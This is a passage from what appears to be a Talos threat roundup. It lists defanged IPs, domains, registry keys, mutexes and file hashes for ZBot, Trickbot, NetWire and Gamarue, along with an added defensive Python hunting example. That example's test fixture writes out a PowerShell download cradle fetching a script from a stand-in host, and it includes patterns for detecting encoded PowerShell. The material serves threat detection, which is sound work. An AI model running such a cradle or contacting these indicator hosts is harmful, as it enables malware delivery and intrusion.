37cc6b1c356b5e15dd0fffc7ca4b58c760f02795ed47cff09e0b314951337a99 380fed9a967852beba37e632a51fce2a08f1c8b3b48330851a1fd40ac6dd1b84 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-Kr_lhWjsnHc/XkbZhu7QZPI/AAAAAAAADRo/vKTi-82YNVQGvQD9whr9pi0XdMYh4TavACLcBGAsYHQ/s1600/1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-bs4E2rUzd_U/XkbjlVL9wHI/AAAAAAAADR0/fHbhDuyvOKgxS0kzjFLPEToFz2W8BPmmQCLcBGAsYHQ/s1600/929d633b1ce45a623bf4090c7fc7de3a9b4ef32febcbb4b2c1e4b3589a965538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-j5fItW8khQM/XkbjrikkxzI/AAAAAAAADR4/vZs3fBvwVlEkaC5oFvNBAJLNQpb3RIsqQCLcBGAsYHQ/s1600/0d52884323396c99de2994a867ebe7ccb325a7a33a6ae3317f4290517232a3ed_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-iVZ0T5_U8iQ/XkbjyoFCH7I/AAAAAAAADR8/4P6m7lf034MouuYEH9GdYx30SXlc81-TgCLcBGAsYHQ/s1600/0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.ZBot-7578445-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 21 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 21 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 21 \n`%System32%\\Tasks\\aybbmte` | 25 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 25 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 25 \n \n#### File Hashes\n\n` 083229d33405150930a1d1cb416882532138571c5dc659afc9cd80c8770e62b8 0c3bd17a29727331d9381f47943c6950b9a01828a1f6337ba17ced510616fff6 156d95f97c320ce13dbbd675c1240447f207096eab813f0ca852c5bec63ee3b5 172985bcfe276d18762f3a0ac551d15f49885e956478bfcc08cf5524d326ea25 1965ff8d288665c76396b6029aeb1337972735a4610ba879cf7bd407fb2a8827 27fdacd8808b754d66dfafbff9e4fc2173a799a94c5251117fe17f3af1428c06 
3dc7b1cc278e41b56b9cf23e4fc10a74ac2c62867beebdacaecb6ba8103f2679 3eb746e6a92be3a38280129157597eccdffa14b881667c4d42167d0fee7e9c36 41dbab1de30bba1ae12cd63c2fccee455f6ac304e8d8909b1e9a9c4df4894620 4e07f974bcd096ee7e4db358855054bad5de2d9f0ec7ab3e3ed4151a3be2f95c 59e9dfc13476d28583402405e503be73e433d16888c2485956634751b9ce525b 5a93627200929bd11b532a8ff6e1df06467af81e80a4aa967873c80cb7ed7c73 5ce641289dee052cf18a3b76b25d77a6fdfa11b794048d86ef31f32889cc8da5 633d2684a78baf37a289ba913060b65c06d47dbe96c91b79cfbf9042cf8353a5 67d7bd9279e73e5563afe27e0145ca66df510167af85cc56fe4172fb6da6f838 79e2d39c6357dc3a3b057f05d0f53bdbaf1e51db61dfde985bee7bc1e05ed33c 7b344ba74f11fe719b8321da501d86598ab43fdf6a662ee1aafe6cd829add6e1 7ceaa69cbffcffefdea99f110c7b031439b0ea8d9caa7f475f117c975989f65b 834fc5e70088fac0e7df245b20ca3319d692763ff28b6407e835cd38a8a4403b 84d61f9eecf8973c0f9815faaff6b676857d0c0065e584b48ba31f8985923317 87db422f9fdc1a6266e78fcf69d9339f5dd2a55288ccf35ad3239da5a6a22d0e 8c43aafc29a44c7b54f5b228961737018b65c949288e170c598810505658cac5 8c754e7edf8a2aecb6d3fec2cbe7e07135fc74beb7aed0e7f3544cdc67266c44 94211619fcc8304b7dabd5d683ee525774c3d9ac34ec7809da2ae27eeb62c49a a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-d6qrZYoKCdk/Xkbj_ntjiSI/AAAAAAAADSI/CW39wdcfw1s6Ko2RCER-1zBgGJIzq9YvQCLcBGAsYHQ/s1600/a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Trickbot-7582953-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue 
Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 29 \n`Global\\785161C887210` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]32[.]21` | 1 \n`216[.]239[.]34[.]21` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 1 \n`104[.]20[.]17[.]242` | 1 \n`116[.]203[.]16[.]95` | 4 \n`50[.]19[.]116[.]122` | 1 \n`69[.]195[.]159[.]158` | 1 \n`190[.]214[.]13[.]2` | 14 \n`181[.]112[.]157[.]42` | 1 \n`181[.]113[.]28[.]146` | 1 \n`181[.]140[.]173[.]186` | 16 \n`119[.]252[.]165[.]75` | 1 \n`45[.]125[.]1[.]34` | 2 \n`54[.]235[.]203[.]7` | 1 \n`23[.]21[.]50[.]37` | 1 \n`198[.]8[.]91[.]10` | 3 \n`121[.]100[.]19[.]18` | 1 \n`171[.]100[.]142[.]238` | 1 \n`82[.]146[.]62[.]52` | 2 \n`5[.]182[.]210[.]246` | 2 \n`5[.]182[.]210[.]226` | 3 \n`51[.]89[.]115[.]116` | 5 \n`85[.]204[.]116[.]237` | 6 \n`93[.]189[.]42[.]146` | 7 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]myexternalip[.]com` | 1 \n`myexternalip[.]com` | 3 \n`icanhazip[.]com` | 1 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`wtfismyip[.]com` | 1 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 2 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 9 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\windirect` | 29 \n`%APPDATA%\\windirect\\settings.ini` | 29 \n`%APPDATA%\\windirect\\data` | 29 \n`%System32%\\Tasks\\Windows Direct core tools` | 29 \n`%SystemRoot%\\Tasks\\Windows Direct core tools.job` | 25 \n`%APPDATA%\\windirect\\bc434c1a3bd87c0cb40c31a3caac7831.exe` | 1 \n`%APPDATA%\\windirect\\7a2bd7d2423c2c83b3bc987c22da348c.exe` | 1 \n`%APPDATA%\\windirect\\a073a92c82bdad2dbdcba4bd1b322bdc.exe` | 1 \n`%APPDATA%\\windirect\\7baba02278378b0d739b212389d20c2c.exe` | 1 \n`%APPDATA%\\WINDIRECT\\<original file name>.exe` | 25 \n \n#### File Hashes\n\n` 007e9d94f91258cdc60ba3fd7df1ed56b00c7c08ecff19c484343ce95978c096 068f1532a0c7e9f564e92f9b093f4cf4a534ef9aa6ee0e6ec6b992beba9404f1 09edeec6283a7986081aeaa4715321a383d675dbfbd2486d01b7e5c9fd81dfc6 0a324fcc5e761067096e9f2161ce3da69c0836972cda72e8740532cc7e84866a 0b19441ced2510b94d977feac51406e3e2a9b9b68f6e8df7a8710c9df29ec8d9 0fe8b3586aa6098767690b4ee1b1fbb39d047fcd7a929d2726f634365eacc6a8 13a865d3702b86db5c13bf6190a03da070ca23c094f8d3c2818ef788655b695b 14fa94928f23ccdb90400c7628327649543d9fd9dae6e963b8c1d96e0ebf7699 184c8d777fe98828143da4f2d762d094475a5eaa9018f77a97e8aad7d5cc696d 1ee8f3dec5556746589f417e1553a7c5f63eca1bab55d5ec95a96feb5ceb7c20 24ce27efe076795d16b9530988cf7b66df89b1f5e1c170a43c509f19b7ca1f94 2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac 29346d7f7895e449a9b09135e2c05deddfddbe9db62db4eb8d33f8f458b13e7a 2b30cd5e49572f0ec94855d7d64ebb4ccfb89c0e2ce0804010a36b892a0e2d3d 2bab0171d0bcbb1be86ef7ea26aa76a10155978a84c08214b156e837a024372a 
34e46ae12096f2a6f3aa9ccc9d59cb94ff0ef151da405f056f43b3b2eb9781b5 3c4bad8514148748ac20c348ad75e47633ee2723db56fb993503719390eeca75 3d9acac16267698fb1f3ac47d0d05a2dda4c4758e9b36c9e1644f89e041556ba 42a29cd7a6ce5a5f864a99968f85e7cb4b8d22383b7e194cfd0d558e463c7b70 46cad7db43d81067d78055680a8434ccf1090e3afbc52654ba4dd905038c7a9a 492425d2ab26c3d88845c3d3ee8c13cd7bef8fc893ec71f61881bd1cde33f358 499a4b0530fcff51c3f8703e727ba8fee36c19229be9a650cd5b7dad1d184a79 4cca83ef698b44352c95dc6b05dbaa1eca0521454179932bb4d8094c01133bfb 4d2be228e84f31aade8e7be4c37e05921e3f94297b2a45fe7fa2ca61d5e8dfbd 4d678fc86bacc1f3c53f7b96c814710a5029306be44a90d32c482719ff308b45 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hoGu7FGpsQo/XkbkN2mLU2I/AAAAAAAADSM/oZbkfOhd1rAp7EtlUP7a9Znu0opqCjgKACLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FN8MIbTAUL4/XkbkRiFG4_I/AAAAAAAADSU/zw7YKnWdnf0WTlI6755e2LX-ngnp1d1TwCLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7578556-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]198[.]117[.]83` | 25 \n \n#### File Hashes\n\n` 05848831206819b63dabd2116e673d28de675e62cf7d858fa4764bfc7a1e9b40 1504dfb0c30dd51fed5c8940d5103479ae565fba3d839f7d973925fa868a6097 17e436f6312f5cb021419beabb8985272593995ccc09110f27abfee1d1eed74e 18bb29e7f9fcc8410d0e613a4989d47b5f1b38023c26bb95a4fe5ae53c2f52ff 1a996582f6a9e60acc72d4266067c9e5ff48ac32bdb45fc8787cc366ff4bd790 27540988f360e65aa1ca42007c551fb73ab1b36ed5408ff098389b6ce3ac0f94 27fb4531c6056a49b297b20a24eafaceabb954aeb24dc00813e85884e2d0a5ce 2ace0152ad8eb298bcae92ebcf3c27c09ed25620c59642be684886bffee56ccb 3c1c1ccf871e10907e69945363ada929b5841d4d192a8422745c47731d33bcfd 3efa7242e48e0be611c350de170776f8537fec4e7c0105ec86e44a18e95db367 46988782ad1012c66e2de02140c2f5d4f210916b0ace64d5c29018336ba76668 4b8c0fcde33aedb55f6e087fd9526699f188f3e3030e33bd04cd8785b748ebe1 4e9562ec338b3e4dbaca5f30289881689f5e4ca5ef7fffb4afe73abe040213b2 5609f2f063ee870c77bfb1e2912d7d5080f85755e069a67c94a6258bebe5f367 5f446e1da31fd31ec83cb6fa2b26da3ae2821ca60273152079736006f498841e 610007b784ce5e7ffa2a2e646e60c72277a0222b2f18fb74eed55d25f1af37dc 6253c1a4ebbfba5de561219996ddc45af59f4ca3b35a3f95354f5ae91c78bbe0 68a0b82d1b3a21dcbd78de0bdb31f69e4afdb4c20750929d9959af168aa4457d 74a0bc89f2667f79264105d44c751d625fbc53ce5a12771134b9c32ca9e916c9 74b44c73bf6f45344bb4aef9f469b3ca92b76b6c0e479e126cab0e35f679c9ca 7caee05382db7f0819893217db61a70cb249d1de1530fedf80e56a9fabc445d6 7e00eca478b68881e4722e2aba2094e468b4b457515d4b8e247b624189ecfc65 8851b44b9e92689115050278bef0261926ecda761a19a566a73fa29de08bad69 89c33a22731e48e90417e2877e318c86a7ac57b5d9ba4c9a39bc65bf27191935 8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n 
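The indicator tables in this roundup are defanged with `[.]` and are labelled "Does not indicate maliciousness" for good reason: several of the listed domains, such as `api[.]ipify[.]org`, `icanhazip[.]com` and `myexternalip[.]com`, are public external-IP lookup services that malware queries to learn its egress address but that admins and legitimate software also use, and the `zen[.]spamhaus[.]org` entry is a reversed-octet DNSBL lookup of the bot's own address. A hit on any of them is context, not a verdict. The "Excessively long PowerShell command detected" entry under Exploit Prevention later in this post describes a behavioural signal of a different kind. The Python below is an added example, not Talos code or tooling: it parses rows in the table format used in this post, refangs them, and runs a constructed batch of Sysmon-style events through two checks, an IOC lookup that down-ranks the low-signal services, and a PowerShell command-line check that uses an assumed 1000-character threshold (Talos does not publish the one AMP uses) and decodes `-EncodedCommand` payloads for the analyst. The indicator values are copied from this post's tables; the hosts, events and the `c2.invalid` URL are constructed.

```python
"""IOC refanging and a two-check hunt over constructed endpoint events.

Added example for this roundup, not Talos code. Indicator values are copied
from the post's tables; hosts, events and the c2.invalid URL are constructed.
"""
import base64
import re

# Rows in the table format used throughout this post (defanged with "[.]").
# Copied from the post; the occurrence column is the number of samples in
# which Talos observed the indicator.
IOC_TABLE = """\
`api[.]ipify[.]org` | 3
`icanhazip[.]com` | 1
`myexternalip[.]com` | 3
`88[.]198[.]117[.]83` | 25
`shareefboy[.]ddns[.]net` | 17
`myp0nysite[.]ru` | 17
`194[.]4[.]56[.]252` | 17
"""

# Public "what is my IP" services: malware queries them, but so do admins and
# legitimate software, so a hit is context rather than a verdict.
LOW_SIGNAL = {"api.ipify.org", "icanhazip.com", "myexternalip.com"}

# Assumed threshold for "excessively long" command lines; Talos does not
# publish the one used by AMP's exploit-prevention engine.
LONG_CMDLINE = 1000


def refang(indicator):
    """Turn a defanged indicator (`evil[.]com`, `1[.]2[.]3[.]4`) into a matchable value."""
    return indicator.strip("` ").replace("[.]", ".").lower()


def parse_ioc_table(text):
    """Return {indicator: occurrences} from rows of the form `value` | n."""
    iocs = {}
    for line in text.splitlines():
        m = re.match(r"\s*`([^`]+)`\s*\|\s*(\d+)\s*$", line)
        if m:
            iocs[refang(m.group(1))] = int(m.group(2))
    return iocs


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand / -Enc / -e (UTF-16LE base64), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events, iocs):
    """Return a list of (host, finding, detail) tuples for Sysmon-style events."""
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process" and "powershell" in ev["image"].lower():
            cmd = ev["cmdline"]
            if len(cmd) > LONG_CMDLINE:
                findings.append((host, "long_powershell_cmdline", f"{len(cmd)} chars"))
            script = decode_encoded_command(cmd)
            if script is not None:
                findings.append((host, "encoded_powershell", script[:60]))
        elif ev["type"] in ("dns", "connect"):
            value = ev["value"].lower()
            if value in iocs:
                kind = "ioc_context" if value in LOW_SIGNAL else "ioc_match"
                findings.append((host, kind, f"{value} (in {iocs[value]} samples)"))
    return findings


# Constructed events (not real telemetry). The encoded command repeats a
# download cradle so that the command line exceeds the length threshold.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/a.ps1');" * 20
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"type": "process", "host": "ws01", "image": PS,
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"type": "process", "host": "ws02", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\inventory.ps1"},
    {"type": "dns", "host": "ws01", "value": "shareefboy.ddns.net"},
    {"type": "connect", "host": "ws01", "value": "88.198.117.83"},
    {"type": "dns", "host": "ws03", "value": "api.ipify.org"},
    {"type": "dns", "host": "ws02", "value": "www.microsoft.com"},
]

if __name__ == "__main__":
    for host, finding, detail in hunt(EVENTS, parse_ioc_table(IOC_TABLE)):
        print(f"{host:<5} {finding:<24} {detail}")
```

Run as-is it reports ws01 three times (long command line, decoded download cradle, and a DNS query plus a connection matching the NetWire and Bladabindi indicators) and ws03 once as `ioc_context`; the ordinary `-File` invocation on ws02 produces nothing. The `-e` short form is matched only when whitespace follows it, so `-ExecutionPolicy` is not mistaken for an encoded command.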
\n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-komG9sMxszw/XkbkeNevidI/AAAAAAAADSc/kg9MJFg4Od4ZtqllEEqpWqFwGxDCzlNCgCLcBGAsYHQ/s1600/8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Gamarue-7580018-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 1081297374 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Sidebars ` | 2 
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: twunk_16.exe ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Taskman ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update Manager ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 1 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\MODULES \nValue Name: Number ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\NOTEPAD \nValue Name: Body ` | 1 \nMutexes | Occurrences \n---|--- \n`alFSVWJB` | 2 \n`PuredairyBB9` | 1 \n`PuredairyBB10` | 1 \n`PuredairyBB2` | 1 \n`PuredairyBB4` | 1 \n`PuredairyBB8` | 1 \n`PuredairyBB7` | 1 \n`PuredairyBB6` | 1 \n`PuredairyBB15` | 1 \n`PuredairyBB14` | 1 \n`PuredairyBB13` | 1 \n`PuredairyBB12` | 1 \n`PSPSndkvsdvd0199201` | 1 \n`PuredairyBB1` | 1 \n`PuredairyBB5` | 1 \n`PuredairyBB3` | 1 \n`PuredairyBB16` | 1 \n`PuredairyBB17` | 1 \n`PuredairyBB18` | 1 \n`PuredairyBB22` | 1 \n`PuredairyBB20` | 1 \n`PuredairyBB21` | 1 \n`PuredairyBB19` | 1 \n`PuredairyBB29` | 1 \n`PuredairyBB31` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 2 \n`23[.]253[.]126[.]58` | 2 \n`184[.]105[.]192[.]2` | 6 \n`104[.]239[.]157[.]210` | 2 \n`104[.]42[.]225[.]122` | 8 \n`40[.]90[.]247[.]210` | 5 \n`40[.]91[.]124[.]111` | 4 \n`20[.]45[.]1[.]107` | 9 \n`109[.]120[.]180[.]29` | 2 \n`94[.]102[.]52[.]19` | 1 \n`217[.]23[.]8[.]142` | 1 \n`109[.]236[.]86[.]119` | 1 \n`93[.]190[.]140[.]141` | 1 \n`108[.]59[.]2[.]221` | 1 \n`109[.]236[.]83[.]12` | 1 \n`80[.]82[.]65[.]207` | 1 \n`217[.]23[.]3[.]105` | 1 \n`217[.]23[.]4[.]220` | 1 \n`93[.]190[.]140[.]113` | 1 \n`217[.]23[.]9[.]104` | 1 \n`93[.]190[.]142[.]191` | 1 \n`94[.]102[.]51[.]231` | 1 \n`217[.]23[.]7[.]3` | 1 \n`80[.]82[.]65[.]199` | 1 \n`109[.]236[.]86[.]27` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`europe[.]pool[.]ntp[.]org` | 9 \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 9 \n`and10[.]uzuzuseubumaandro[.]com` | 1 \n`powerrembo[.]ru` | 2 \n`and4[.]junglebeariwtc1[.]com` | 1 \n`faumoussuperstars[.]ru` | 2 \n`martivitapoint[.]info` | 1 \n`and10[.]uzuzuseubumaandro1[.]com` | 1 \n`spotxte[.]com` | 1 \n`nutqauytva8azxd[.]com` | 2 \n`nutqauytva100azxd[.]com` | 2 \n`nutqauytva2azxd[.]com` | 2 \n`nutqauytva10azxd[.]com` | 2 \n`nutqauytva6azxd[.]com` | 2 \n`nutqauytva11azxd[.]com` | 2 \n`nutqauytva3azxd[.]com` | 2 \n`nutqauytva9azxd[.]com` | 2 \n`nutqauytva7azxd[.]com` | 2 \n`nutqauytva5azxd[.]com` | 2 \n`nutqauytva4azxd[.]com` | 2 \n`109[.]120[.]180[.]29` | 1 \n`vedivenivici[.]ml` | 2 \n`delvernet[.]info` | 2 \n`otter[.]pw` | 2 \n`oingee[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\Documents and Settings\\All Users\\mslkrru.exe` | 9 \n`%APPDATA%\\WindowsUpdate` | 1 \n`\\RECYCLER` | 7 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-18611771` | 5 \n`\\TEMP\\C\\UPDATE` | 1 \n`%APPDATA%\\WindowsUpdate\\MSupdate.exe` | 1 
\n`%APPDATA%\\alFSVWJB` | 2 \n`%ProgramData%\\msodtyzm.exe` | 11 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-1861771` | 2 \n`%ProgramData%\\~` | 11 \n`%APPDATA%\\alFSVWJB\\twunk_16.exe` | 1 \n`%APPDATA%\\winamfes.exe` | 2 \n`%APPDATA%\\alFSVWJB\\splwow64.exe` | 1 \n`%TEMP%\\-1631195624.bat` | 1 \n`%TEMP%\\115828.bat` | 1 \n`%APPDATA%\\alFSVWJB\\winhlp32.exe` | 1 \n \n#### File Hashes\n\n` 0e6f120bd1607731a34778c8d2f3a038414dd3d263ca25c5e5941558ece492ca 1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4 1d453682f2771631919717c54b95b6e90a1e4231c9c503ef4b5fa302e247d314 1f7c808b0fb82df3a2e27e4819224d176f1be5dca98752ca0545591e740112e6 20ba9da6df29a870a6826425b23b7508606bdaad662f0238da378091ed1067ef 2324b414e6300fab1abdc2d1e5bb128544c94419dcc6656b105bc69865480d88 36b578d5abac82fd7db98a77869112dbf7e0bfa8433febca08b1c16370f68a2f 3887f3a97e906d5bd9d94ba1117953c46ba0dd1cd5fbae4653f4cd1924ae258e 5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41 68b13c4a8a9fe01bf0567627d099b1a6cb98eef7bd4762bbee5420efbcc8a470 693086bd9b704e5927f76f40a8b04136b1f7d94a482a9020126819a407d24aa8 6edddbf48f261ae99c5a7dfd3fc2c443a3674f68ca3076b391c89e7023dc4c54 70c203465f54113975e075563cf824ba3632a3227eddd38c651b8f5a58cf2bae 7b3c8d5208b4c9e1747e670c67d44a581c68e299a486eba6d7f96cbe527e6855 7b3efe2cf5dc30bf2329986bdcd680f4195a8f750f507e96a3395d8a4a9310fb 82687cd40932329348005bb61782e5b5493faae26389d7a3300e5ba40af04dce 87892d4d4693dc87d4195a0aa30bba294841580f2a4c81948c37018b69dc69d8 966eac6b067db2163c8e82669373c17ea335fff18280f848e6b8202e00a905d2 98788fbe094bd1260aaa7120fa02cf183ab09f7a32c0a4cba68074316c276ce6 aa6eea166b8cffd5763b79f47f6f8cbeea328a056e7a0152ceb104cc59c1e320 bec5979b7d191703cbce4a4c88171b89ab97b07fba0e0dd001ffe8dee9689049 d3f847257945d883bc02431f7561d661b56b7177941b5d7451528bdfc28b4ca6 d6f2570910b38e15acb876ced00d7f877fa9ded01a15c3e07710319a50adf8cb d7f4e9cab07e8c2826ee70b6a45d51b18892cfa5d4a92ce318c43eed2399fe54 
